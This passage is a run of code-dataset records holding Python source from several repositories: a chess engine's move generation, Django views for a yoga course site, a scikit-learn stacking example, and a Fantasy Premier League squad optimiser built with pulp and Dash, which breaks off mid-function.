<= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == b_moves or pinDirection == (-b_moves[0], -b_moves[\n 1]): # if the piece isn't pinned or the pin direction is the same as the bishop move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\":\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getRookMoves(self, row, col, possibleMoves): # get rook moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n if self.board[row][col][1] != 'Q': # if the piece isn't a queen\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n rookMoves = ((-1, 0), (0, -1), (1, 0), (0, 1)) # up, left, down, right\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for r_move in rookMoves: # for each move in the list of rook moves\n for i in range(1, 8): # for each square in the row\n endRow = row + r_move[0] * i # get the row of the end square\n endCol = col + r_move[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == r_move or pinDirection == (-r_move[0], -r_move[\n 1]): # if the piece isn't pinned or the pin direction is the same as the rook move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\": # if the end square is empty\n possibleMoves.append(Move((row, col), (endRow, endCol),\n 
self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getQueenMoves(self, row, col, possibleMoves): # get queen moves function\n self.getBishopMoves(row, col, possibleMoves) # get bishop moves\n self.getRookMoves(row, col, possibleMoves) # get rook moves\n\n def getKingMoves(self, row, col, possibleMoves): # get king moves function\n rowMoves = (-1, -1, -1, 0, 0, 1, 1, 1) # row offsets for the 8 king directions\n colMoves = (-1, 0, 1, -1, 1, -1, 0, 1) # column offsets for the 8 king directions\n\n if self.whiteToMove: # if the player is white\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for k_move in range(8): # for each move in the list of king moves\n endRow = row + rowMoves[k_move] # get the row of the end square\n endCol = col + colMoves[k_move] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is the enemy color\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (endRow, endCol) # set the white king location to the end square\n else:\n self.blackKingLocation = (endRow, endCol) # set the black king location to the end square\n\n inCheck, pins, checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if not inCheck: # if the king isn't in check\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (row, col) # set the white king location to the start square\n else:\n self.blackKingLocation = (row, col) # set the black king location to the start square\n\n def getCastleMoves(self, row, col, moves, allyColor): # get castle moves function\n if self.squareUnderAttack(row, col): # if the square is under attack\n return\n if (self.whiteToMove and self.currentCastlingRights.wks) or (\n not self.whiteToMove and self.currentCastlingRights.bks): # if the player can castle kingside\n self.getKingCastleMoves(row, col, moves, allyColor) # get the king castle moves\n\n if (self.whiteToMove and self.currentCastlingRights.wqs) or (\n not self.whiteToMove and self.currentCastlingRights.bqs): # if the player can castle queenside\n self.getQueenCastleMoves(row, col, moves, allyColor) # get the queen castle moves\n\n def getKingCastleMoves(self, row, col, moves, allyColor): # get king castle moves function\n if self.board[row][col + 1] == '--' and self.board[row][\n col + 2] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col + 1)) and (\n not self.squareUnderAttack(row, col + 2)): # if the squares are not under attack\n moves.append(Move((row, col), (row, col + 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def getQueenCastleMoves(self, row, col, moves, allyColor): # get queen castle moves function\n if self.board[row][col - 1] == '--' and self.board[row][col - 2] == '--' and self.board[row][\n col - 3] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col - 1)) and (\n not self.squareUnderAttack(row, col - 2)): # if the squares are not under attack\n moves.append(Move((row, 
col), (row, col - 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def checkForPinsAndChecks(self): # check for pins and checks function\n pins = []\n checks = []\n inCheck = False\n if self.whiteToMove: # if the player is white\n allyColor = 'w'\n enemyColor = 'b'\n startRow = self.whiteKingLocation[0] # get the white king's row\n startCol = self.whiteKingLocation[1] # get the white king's column\n else: # if the player is black\n allyColor = 'b'\n enemyColor = 'w'\n startRow = self.blackKingLocation[0] # get the black king's row\n startCol = self.blackKingLocation[1] # get the black king's column\n\n # directions = ((-1, -1), (-1, 0), (-1, 1), (1, -1), (1, 0), (1, 1), (0, -1), (0, 1))\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\n for j in range(len(directions)): # for each direction\n d = directions[j] # get the direction\n possiblePin = () # set the possible pin to an empty tuple\n for i in range(1, 8): # for each square in the direction\n endRow = startRow + d[0] * i # get the row of the end square\n endCol = startCol + d[1] * i # get the column of the end square\n\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == allyColor and endPiece[\n 1] != 'K': # if the end square is the ally color and is not a king\n if possiblePin == (): # if the possible pin is empty\n possiblePin = (\n endRow, endCol, d[0], d[1]) # set the possible pin to the end square and the direction\n else:\n break\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n type = endPiece[1]\n # print(\"Black King location\", self.blackKingLocation)\n # print(startRow, startCol,\" enemy found in direction \", d[0], d[1], enemyColor, type, endRow, endCol, i, j)\n # print((i == 1 and type == 'P' and ((enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))))\n # if enemy piece found near King\n if (0 <= j <= 3 and type == 'R') or \\\n (4 <= j <= 7 and type == 'B') or \\\n (i == 1 and type == 'P' and (\n (enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))) or \\\n (type == 'Q') or \\\n (i == 1 and type == 'K'): # if the enemy piece is a rook, bishop, queen, or king\n if possiblePin == (): # if the possible pin is empty\n inCheck = True # if enemy directly in range of King\n # print(\"king in check by: \", enemyColor, type, endRow, endCol)\n checks.append((endRow, endCol, d[0], d[1]))\n break\n else:\n pins.append(possiblePin) # if ally piece in between king and enemy\n break\n else:\n break # if no enemy found the respective direction that poses threat\n else:\n break\n\n # Special Case for Knight Moves\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n for m in knightMoves: # for each knight move\n endRow = startRow + m[0] # get the row of the end square\n endCol = startCol + m[1] # get the column of the end square\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == enemyColor and endPiece[\n 1] == 'N': # if the end square is the enemy color and is a knight\n inCheck = True # if enemy directly in range of King\n checks.append((endRow, endCol, m[0], m[1])) # add the check to the list of checks\n return inCheck, pins, checks\n\n\nclass CastleRights(): # class for castle rights\n def __init__(self, wks, bks, wqs, 
bqs): # constructor\n self.wks = wks\n self.bks = bks\n self.wqs = wqs\n self.bqs = bqs\n\n\nclass Move():\n ranksToRows = {\"1\": 7,\n \"2\": 6,\n \"3\": 5,\n \"4\": 4,\n \"5\": 3,\n \"6\": 2,\n \"7\": 1,\n \"8\": 0} # dictionary for converting ranks to rows\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3, \"e\": 4, \"f\": 5, \"g\": 6,\n \"h\": 7} # dictionary for converting files to columns\n colsToFiles = {v: k for k, v in filesToCols.items()} # constructor\n\n def __init__(self, startSq, endSq, board, isEnpassantMove=False, isCastleMove=False, AIPromotionKey='Q',\n AIPlaying=False): # constructor\n self.startRow = startSq[0] # get the start row\n self.startCol = startSq[1] # get the start column\n self.endRow = endSq[0] # get the end row\n self.endCol = endSq[1] # get the end column\n self.pieceMoved = board[self.startRow][self.startCol] # get the piece that was moved\n self.pieceCaptured = board[self.endRow][self.endCol] # get the piece that was captured\n\n # For AI:\n self.AIPromotionKey = AIPromotionKey # get the promotion key\n self.AIPlaying = AIPlaying # get the AI playing boolean\n\n # For Pawn Promotion:\n self.isPawnPromotion = False\n if (self.pieceMoved == 'wP' and self.endRow == 0) or (\n self.pieceMoved == 'bP' and self.endRow == 7): # if the pawn is at the end of the board\n self.isPawnPromotion = True # set the pawn promotion boolean to true\n\n # For Enpassant Move:\n self.isEnpassantMove = isEnpassantMove # get the enpassant move boolean\n if self.isEnpassantMove: # if the move is an enpassant move\n if self.pieceMoved == 'wP':\n self.pieceCaptured = 'bP'\n else:\n self.pieceCaptured = 'wP'\n\n self.isCastleMove = isCastleMove # get the castle move boolean\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow * 10 + self.endCol # get the move ID\n\n def __eq__(self, other): # overloaded equality operator\n if isinstance(other, Move): # if the other object is a move\n return self.moveID == other.moveID # return the move ID of the move\n\n def getChessNotation(self): # get the chess notation of the move\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow,\n self.endCol) # return the chess notation of the move\n\n def getRankFile(self, row, col): # get the rank and file of the square\n return self.colsToFiles[col] + self.rowsToRanks[row] # return the rank and file of the square\n","repo_name":"Daymenion/Machine-Learning-Example-Projects","sub_path":"Chess Engine Alpha-Beta Punning and MinMax Search/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":38583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21761089453","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom Database.models import BuyRecord, Course # 用户购买课程的记录\nfrom Tools.SessionManager import SessionManager\nfrom Tools.URLPath import url_index, url_course_view_course\nfrom .forms import AddCourseForm, ModCourseForm\n\n\ndef viewCourse(request): # 查看课程信息\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): #如果是管理员登陆\n courses = Course.objects.all() # 查询全部课程信息\n Authority = 'Admin'\n\n else: #如果是客户登陆\n courses = Course.objects.filter(course_flag=True) # 查询在使用的课程信息\n Authority = 'Customer'\n\n return render(request, 'coursemessageUI.html', {'order': courses, 'Authority': Authority})\n\n\ndef viewCourseDetails(request, coursename): # 显示课程的详细信息\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): #如果是管理员登陆\n courses = Course.objects.get(coursename=coursename) # 查询当前课程信息,为了后面显示详细信息\n detailcourse = BuyRecord.objects.filter(coursename=coursename) # 查询这个课程的所有订单(包括付钱和没付钱的)\n Authority = 'Admin'\n\n else: #如果是客户登陆\n username = sessionManager.getUsername() # 获取当前登录的用户名字\n courses = Course.objects.get(coursename=coursename) # 查询当前课程信息,为了后面显示详细信息\n detailcourse = BuyRecord.objects.filter(username=username,coursename=coursename) # 查询这个用户关于这门课的订单状态(付钱和没付钱的)\n Authority = 'Customer'\n return render(request, 'detailmessageUI.html', {'Authority': Authority, 'courses':courses,'order1': detailcourse})\n\n\ndef addCourse(request): # 管理员增加课程信息\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST':\n addcourseForm = AddCourseForm(request.POST)\n if addcourseForm.is_valid():\n coursename = addcourseForm.cleaned_data.get('coursename')\n courseintroduction = addcourseForm.cleaned_data.get('courseintroduction')\n courseprice = addcourseForm.cleaned_data.get('courseprice')\n course = Course()\n course.create(coursename,courseintroduction,courseprice)\n return HttpResponseRedirect(url_course_view_course)\n else:\n addcourseForm = AddCourseForm()\n Authority = 'Admin'\n return render(request, 'addcourseUI.html', locals())\n\n\ndef ModCourse(request, coursename): # 修改课程信息界面\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST': # 如果请求为表单提交\n modcourseForm = ModCourseForm(request.POST) # 获取表单内容\n if modcourseForm.is_valid(): # 解析表单\n courseintroduction = modcourseForm.cleaned_data['courseintroduction']\n courseprice = modcourseForm.cleaned_data['courseprice']\n R = Course.objects.get(coursename=coursename) # 查询当前修改信息的课程对象\n R.setCourseIntroduction(courseintroduction)\n R.setCoursePrice(courseprice)\n return HttpResponseRedirect(url_course_view_course) # 写成功之后,跳转到查看课程\n else:\n r = Course.objects.get(coursename=coursename) # 查询当前课程的信息\n modcourseForm = ModCourseForm(instance=r) # 创建表单\n return render(request, 'modcourseUI.html', locals())\n\n\ndef DelCourse(request, coursename): # 执行下架操作\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # 先获取当前课程信息\n P.setCourseFlag(False) # 下架课程\n Authority = 'Admin'\n return render(request, 'successfulUI.html', locals())\n\n\ndef reAddCourse(request, coursename): # 执行重新上架操作\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return 
HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # 先获取当前课程信息\n P.setCourseFlag(True) # 重新上架课程\n return render(request, 'successfulUI.html', locals())\n\n","repo_name":"shao0099876/AmyYoga","sub_path":"AmyYoga/AmyYoga/Course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"6428877716","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import cross_validation\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\n# Classifiers\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\n\nnp.random.seed(2017) # seed to shuffle the train set\n\n# read the data in\ndf = pd.read_csv(\"chapter4/Diabetes.csv\")\n\nX = df.ix[:,0:8] # independent variables\ny = df['class'].values # dependent variables\n\n#Normalize\nX = StandardScaler().fit_transform(X)\n\n# evaluate the model by splitting into train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=2017)\nkfold = cross_validation.StratifiedKFold(y=y_train, n_folds=5, random_state=2017)\nnum_trees = 10\n\nverbose = True # to print the progress\n\nclfs = [KNeighborsClassifier(),RandomForestClassifier(n_estimators=num_trees, random_state=2017),\n GradientBoostingClassifier(n_estimators=num_trees, random_state=2017)]\n\n#Creating train and test sets for blending\ndataset_blend_train = np.zeros((X_train.shape[0], len(clfs)))\ndataset_blend_test = np.zeros((X_test.shape[0], len(clfs)))\n\nprint('5-fold cross validation:\\n')\n\nfor i, clf in enumerate(clfs):\n scores = cross_validation.cross_val_score(clf, X_train, y_train, cv=kfold,scoring='accuracy')\n print(\"##### Base Model %0.0f #####\" % i)\n print(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\n clf.fit(X_train, y_train)\n print(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_train),y_train)))\n dataset_blend_train[:,i] = clf.predict_proba(X_train)[:, 1]\n dataset_blend_test[:,i] = clf.predict_proba(X_test)[:, 1]\n print(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_test),y_test)))\n\nprint (\"##### Meta Model #####\")\nclf = LogisticRegression()\nscores = cross_validation.cross_val_score(clf, dataset_blend_train, y_train,\ncv=kfold, scoring='accuracy')\nclf.fit(dataset_blend_train, y_train)\n\nprint(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\nprint(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_train), y_train)))\nprint(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_test), y_test)))","repo_name":"raja21068/Machine-Learning-Toturials","sub_path":"78_Stacking.py","file_name":"78_Stacking.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"18703713466","text":"import os\nimport pdb\nimport pulp\nimport random\nimport shap\nfrom pathlib import Path\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output, State\nfrom app import app\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nfrom fastai.tabular import load_learner\n\ntry:\n from layouts.layout_utils import make_table, make_dropdown, make_line_plot\n from scripts.data_loader import DataLoader, check_cache_validity\n from scripts.data_processor import DataProcessor\n from scripts.data_scrape import DataScraper\n from scripts.utils import load_config\n from app import cache\n from scripts.data_preparation import ModelDataMaker\n from scripts.model_data_ingestion import DataIngestor\n from scripts.feature_engineering import make_XY_data\n from scripts.models import load_data, train_lgbm_model, train_fastai_model\nexcept:\n raise ImportError\n\nCONFIG_2020 = {\n \"data_dir\": \"./data/model_data/2020_21/\",\n \"file_fixture\": \"fixtures.csv\",\n \"file_team\": \"teams.csv\",\n \"file_gw\": \"merged_gw.csv\",\n \"file_player\": \"players_raw.csv\",\n \"file_understat_team\": \"understat_team_data.pkl\",\n \"scoring_gw\": \"NA\"\n}\n\nTIMEOUT = 3600\n\n\ndef add_position_dummy(df):\n for p in df.position.unique():\n df['is_' + str(p).lower()] = np.where(df.position == p, int(1), int(0))\n return df\n\n\ndef add_team_dummy(df):\n for t in df.team.unique():\n df['team_' + str(t).lower()] = np.where(df.team == t, int(1), int(0))\n return df\n\n\ndef squad_optimizer(df, formation, budget=100.0, optimise_on='LGBM Point'):\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL', pulp.LpMaximize)\n # create a dictionary of pulp variables with keys from names\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[optimise_on])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n 
fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n df_squad = pd.DataFrame(optimal_squad)\n df_squad = df_squad.sort_values(by=['position', 'points'], ascending=False)\n return df_squad, solution_info\n\n\ndef transfer_optimizer(df_leads, manager_id, num_transfers, model_name):\n\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n config = load_config()\n data_loader = DataLoader(config)\n df_team = pd.DataFrame(data_loader.get_manager_current_gw_picks(manager_id))\n df_team = df_team.rename(columns={\"element\": \"player_id\"})\n bank = data_loader.get_manager_bank_balance(manager_id)\n\n df_cost = df_leads[[\"player_id\", \"cost\", \"name\", model_name]].copy()\n df_team = pd.merge(df_team, df_cost, how='inner', on='player_id')\n prev_score = df_team[model_name].sum()\n\n budget = df_team[\"cost\"].sum() + bank\n\n # print(df_team.head())\n # print(df_leads.head())\n # print(budget)\n\n # optimization\n\n df = df_leads.copy()\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n current_players = df_team[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL_Transfers', pulp.LpMaximize)\n\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[model_name])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n formation = '2-5-5-3'\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n constraints[\"num_keep\"] = 15 - num_transfers\n\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n fpl_problem += sum([x[i] for i in current_players]) == constraints['num_keep']\n\n # team constraints\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n 
total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n # pdb.set_trace()\n df_squad = pd.DataFrame(optimal_squad)\n now_score = df_squad[\"points\"].sum()\n new_squad = set(df_squad[\"name\"].unique().tolist())\n current_players = set(current_players)\n transfer_in = list(new_squad.difference(current_players))\n transfer_out = list(current_players.difference(new_squad))\n transfer_in = [in_player.decode('utf-8') for in_player in transfer_in]\n transfer_out = [out_player.decode('utf-8') for out_player in transfer_out]\n df_res = pd.DataFrame()\n gain = [0 for i in range(len(transfer_in))]\n gain[-1] = now_score - prev_score\n df_res[\"Transfer In\"] = transfer_in\n df_res[\"Transfer Out\"] = transfer_out\n df_res[\"gain\"] = gain\n df_res[\"gain\"] = df_res[\"gain\"].round(2)\n df_res[\"gain\"] = df_res[\"gain\"].astype(str)\n df_res[\"gain\"] = df_res[\"gain\"].apply(lambda y: \"\" if int(float(y)) == 0 else y)\n df_res = df_res.rename(columns={\"gain\": \"Gain\"})\n return df_res\n\n\n@cache.memoize(timeout=TIMEOUT)\ndef load_leads(gw_id):\n data_maker = ModelDataMaker(CONFIG_2020)\n output_dir = \"./data/model_outputs/\"\n lgbm_point_path = os.path.join(output_dir, \"lgbm_point_predictions_gw_{}.csv\".format(gw_id))\n lgbm_potential_path = os.path.join(output_dir, \"lgbm_potential_predictions_gw_{}.csv\".format(gw_id))\n lgbm_return_path = os.path.join(output_dir, \"lgbm_return_predictions_gw_{}.csv\".format(gw_id))\n\n fastai_point_path = os.path.join(output_dir, \"fastai_point_predictions_gw_{}.csv\".format(gw_id))\n fastai_potential_path = os.path.join(output_dir, \"fastai_potential_predictions_gw_{}.csv\".format(gw_id))\n fastai_return_path = os.path.join(output_dir, \"fastai_return_predictions_gw_{}.csv\".format(gw_id))\n all_paths = [lgbm_point_path, lgbm_potential_path, lgbm_return_path,\n fastai_point_path, fastai_potential_path, fastai_return_path]\n dfs = []\n for file_path in all_paths:\n if not check_cache_validity(file_path, valid_days=2.0):\n return html.P(\"refresh model scores\")\n df = pd.read_csv(file_path)\n dfs.append(df)\n XY_train, XY_test, XY_scoring, features_dict = load_data(gw_id)\n player_id_team_id_map = data_maker.get_player_id_team_id_map()\n player_id_player_name_map = data_maker.get_player_id_player_name_map()\n player_id_player_position_map = data_maker.get_player_id_player_position_map()\n team_id_team_name_map = data_maker.get_team_id_team_name_map()\n player_id_cost_map = data_maker.get_player_id_cost_map()\n player_id_play_chance_map = data_maker.get_player_id_play_chance_map()\n player_id_selection_map = data_maker.get_player_id_selection_map()\n player_id_ave_points_map = data_maker.get_player_id_ave_points_map()\n\n df_leads = pd.DataFrame()\n df_leads[\"player_id\"] = XY_scoring[\"player_id\"].values\n df_leads[\"name\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_name_map.get(x, x))\n df_leads[\"team\"] = df_leads[\"player_id\"].apply(lambda x: team_id_team_name_map[player_id_team_id_map.get(x, x)])\n df_leads[\"next_opponent\"] = XY_scoring[\"opp_team_id\"].apply(lambda x: team_id_team_name_map.get(x, x))\n df_leads[\"position\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_position_map.get(x, x))\n df_leads[\"chance_of_play\"] = 
df_leads[\"player_id\"].apply(lambda x: player_id_play_chance_map.get(x, x))\n df_leads[\"cost\"] = df_leads[\"player_id\"].apply(lambda x: player_id_cost_map.get(x, x))\n df_leads[\"selection_pct\"] = df_leads[\"player_id\"].apply(lambda x: player_id_selection_map.get(x, x))\n df_leads[\"ave_pts\"] = df_leads[\"player_id\"].apply(lambda x: player_id_ave_points_map.get(x, x))\n df_leads[\"gw\"] = gw_id\n df_leads = df_leads.drop_duplicates(subset=[\"player_id\"])\n\n # merge predictions\n for df in dfs:\n df = df.drop_duplicates()\n df_leads = pd.merge(df_leads, df, how='left', on=['player_id', 'gw'])\n df_leads[\"cost\"] = df_leads[\"cost\"] / 10\n\n model_name_col_map = {\n \"LGBM Point\": \"lgbm_point_pred\",\n \"LGBM Potential\": \"lgbm_potential_pred\",\n \"LGBM Return\": \"lgbm_return_pred\",\n \"Fast Point\": \"fastai_point_pred\",\n \"Fast Potential\": \"fastai_potential_pred\",\n \"Fast Return\": \"fastai_return_pred\"\n }\n col_model_name_map = dict()\n for k, v in model_name_col_map.items():\n col_model_name_map[v] = k\n\n df_leads = df_leads.rename(columns=col_model_name_map)\n df_leads[\"Net\"] = (2 * df_leads[\"LGBM Point\"] + df_leads[\"LGBM Potential\"] +\n 2 * df_leads[\"Fast Point\"] + df_leads[\"Fast Potential\"]) * df_leads[\"Fast Return\"] * df_leads[\n \"LGBM Return\"]\n max_net = df_leads[\"Net\"].max()\n df_leads[\"Net\"] = df_leads[\"Net\"] / max_net\n return df_leads\n\n\n@app.callback(Output('player-compare-output', 'children'),\n [Input('player-selection-dropdown-a', 'value'),\n Input('player-selection-dropdown-b', 'value'),\n Input('gw-selection-dropdown-squad', 'value')],\n prevent_initial_call=True)\ndef execute_player_comparison(player_a, player_b, gw_id):\n if not player_a:\n msg = html.P(\"Please select first player\")\n return msg\n if not player_b:\n msg = html.P(\"Please select second player\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select gameweek in left layout\")\n return msg\n #\n df_leads = load_leads(gw_id)\n\n # normalization\n pot_div = 12\n point_div = 6\n retrun_div = 0.8\n\n df_leads[\"LGBM Potential\"] = df_leads[\"LGBM Potential\"] / pot_div\n df_leads[\"Fast Potential\"] = df_leads[\"Fast Potential\"] / pot_div\n df_leads[\"LGBM Point\"] = df_leads[\"LGBM Point\"] / point_div\n df_leads[\"Fast Point\"] = df_leads[\"Fast Point\"] / point_div\n df_leads[\"LGBM Return\"] = df_leads[\"LGBM Return\"] / 0.8\n df_leads[\"Fast Return\"] = df_leads[\"Fast Return\"] / 0.4\n df_leads[\"Net\"] = df_leads[\"Net\"] / 0.4\n df_leads[\"Cost\"] = df_leads[\"cost\"] / 10.0\n\n df_a = df_leads[df_leads[\"name\"] == player_a].copy()\n df_b = df_leads[df_leads[\"name\"] == player_b].copy()\n keep_cols = [\"LGBM Point\", \"LGBM Potential\", \"LGBM Return\",\n 